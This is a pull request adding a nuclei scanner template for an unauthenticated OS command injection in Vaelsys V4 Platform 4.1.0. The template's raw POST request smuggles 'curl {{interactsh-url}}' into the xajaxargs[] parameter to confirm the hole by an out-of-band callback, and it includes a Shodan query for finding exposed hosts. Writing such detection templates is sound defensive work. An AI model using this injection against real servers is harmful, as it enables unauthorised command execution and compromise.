### PR TITLE
Add CVE-2026-2952: Vaelsys V4 Platform OS Command Injection

### DIFF
--- a/http/cves/2026/CVE-2026-2952.yaml
+++ b/http/cves/2026/CVE-2026-2952.yaml
@@ -1,0 +1,49 @@
+id: CVE-2026-2952
+
+info:
+  name: Vaelsys V4 Platform 4.1.0 - OS Command Injection via xajaxargs
+  author: optimus-fulcria
+  severity: high
+  description: |
+    Vaelsys V4 Platform version 4.1.0 contains an OS command injection vulnerability in the /tree/tree_server.php endpoint. The xajaxargs[] parameter is not properly sanitized, allowing unauthenticated remote attackers to inject arbitrary operating system commands via shell metacharacters. The application passes user input directly to system/exec functions without escaping.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary operating system commands on the server, leading to complete system compromise, data exfiltration, and persistent backdoor access.
+  remediation: |
+    Contact the vendor for a patch. Restrict network access to the Vaelsys V4 Platform management interface.
+  reference:
+    - https://github.com/CVE-Hunter-Leo/CVE/issues/10
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2952
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: CVE-2026-2952
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"Vaelsys"
+    product: vaelsys_v4_platform
+    vendor: vaelsys
+  tags: cve,cve2026,vaelsys,rce,cmdi,unauth,oast
+
+http:
+  - raw:
+      - |
+        POST /tree/tree_server.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        xajaxr=1&xajax=call_method&xajaxargs[]=auth&xajaxargs[]=setSystemTimezone&xajaxargs[]=<xjxobj><e><k>1</k><v>;curl+{{interactsh-url}};%23</v></e></xjxobj>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - http
+
+      - type: status
+        status:
+          - 200
+          - 500
+        condition: or


### PR DESCRIPTION
## Description

Adds a nuclei template for CVE-2026-2952: OS Command Injection in Vaelsys V4 Platform 4.1.0.

## Vulnerability Details

- **Product**: Vaelsys V4 Platform 4.1.0
- **Type**: OS Command Injection (CWE-78)
- **CVSS**: 7.3 (High)
- **Auth Required**: None
- **Published**: 2026-02-22

The `/tree/tree_server.php` endpoint does not properly sanitize the `xajaxargs[]` parameter, allowing unauthenticated attackers to inject arbitrary OS commands via shell metacharacters (semicolons). The application passes user input directly to system/exec functions.

## Template Details

- Uses OOB interaction (interactsh) for safe detection
- Sends a `curl` command to interactsh URL via command injection
- Validates via HTTP callback confirmation
- No destructive actions performed

## References

- https://github.com/CVE-Hunter-Leo/CVE/issues/10
- https://nvd.nist.gov/vuln/detail/CVE-2026-2952